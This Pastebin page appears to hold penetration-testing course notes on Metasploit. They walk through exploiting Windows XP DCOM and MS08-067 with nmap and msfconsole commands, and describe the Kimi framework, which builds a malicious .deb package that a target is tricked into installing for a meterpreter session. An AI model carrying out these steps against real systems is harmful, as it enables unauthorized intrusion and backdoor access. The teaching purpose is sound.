Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Grade 2 Session 7
- ===================
- Metasploit Framework
- ====================
- Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. Most of the researchers uses this tool for exploiting devices, machine, databases and servers.
- This tool is a product of Rapid7 community.
- Metasploit Framework we use is a trial version|limited version.
- MODULE CONTAINING :
- Payloads
- Exploits
- Auxiliary
- Encoders
- NOPS
- Post
- Terminologies
- =============
- 1. Vulnerabilities
- 2. Exploit
- 3. Payload
- 4. Backdoor
- 5. Covering Traces
- Terms
- =====
- RHOST : Remote Host - Target's IP Address in which we have to attack.
- RPORT : Remote Port - The port number of target machine on which a vulnerable service is running
- LHOST : Listening Host - Attacker's IP Address on which they are listening to reverse connection
- LPORT : Listening Port - The port number on which an attacker is listening the reverse connection.
- CONSOLE BASED EXPLOIT - 1
- ==========================
- Reuirements :
- = XP Service Pack 0 And Service Pack 1
- = Kali Linux
- = Metasploit Framework
- KALI : https://www.exploit-db.com/exploits/66/
- DCOM is an acronym that stands for Distributed Component Object Model is a protocol that enables software components to communicate directly over a network which by default runs in Win XP SP0-SP1 and Win Server 2000.
- Steps:
- ======
- 1. nmap -sS -sC -sV <IP Address>
- 2. nmap -A -T4 <IP Address>
- 3. msfconsole
- 4. search the corresponding exploit
- search dcom
- 5. use <path of the above exploit>
- 6. show info - information of the exploit
- 7. show options - to show the options of the exploit
- 8. set RHOST <target IP Address>
- 9. show options
- 10. exploit
- CONSOLE BASED EXPLOIT - 2
- =========================
- Reuirements :
- = XP Service Pack 2
- = Kali Linux ---> Updates
- = Metasploit Framework
- Netapi32.dll is a module that contains the Windows NET API used by applications to access a Microsoft network. netapi32.dll is a system process that is needed for your PC to work properly and it should not be removed. The version of Netapi.dll in Win Xp SP2 is vulnerable and allows the remote attacker to get the remote access of the machine.
- LINK : https://www.exploit-db.com/exploits/40279/
- Steps:
- ======
- 1. nmap -sS -sC -sV <IP Address>
- 2. nmap -A -T4 <IP Address>
- 3. msfconsole
- 4. search the corresponding exploit
- search ms08-067/netapi
- 5. use <path of the above exploit>
- 6. show info --> information of the exploit
- 7. show options --> to show the options of the exploit
- 8. set RHOST <target IP Address>
- 9. show options
- 10. exploit
- KiMi Framework
- ==============
- It is a framework for exploiting linux based OS. It is named after a character of Naruto - Kimimaro. In this framework, we create a malicious file of extension .deb (debian file extension). We ask the target to install that debian package. as soon as the target install the debian package, we will receive a meterpreter session.
- We need to download this framework from github
- https://github.com/ChaitanyaHaritash/kimi
- STEPS :
- =======
- Copy the link
- Open the linux teminal and type
- #git clone https://github.com/ChaitanyaHaritash/kimi.git
- #cd kimi
- #python kimi.py -h(help page)
- https://www.offensive-security.com/metasploit-unleashed/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement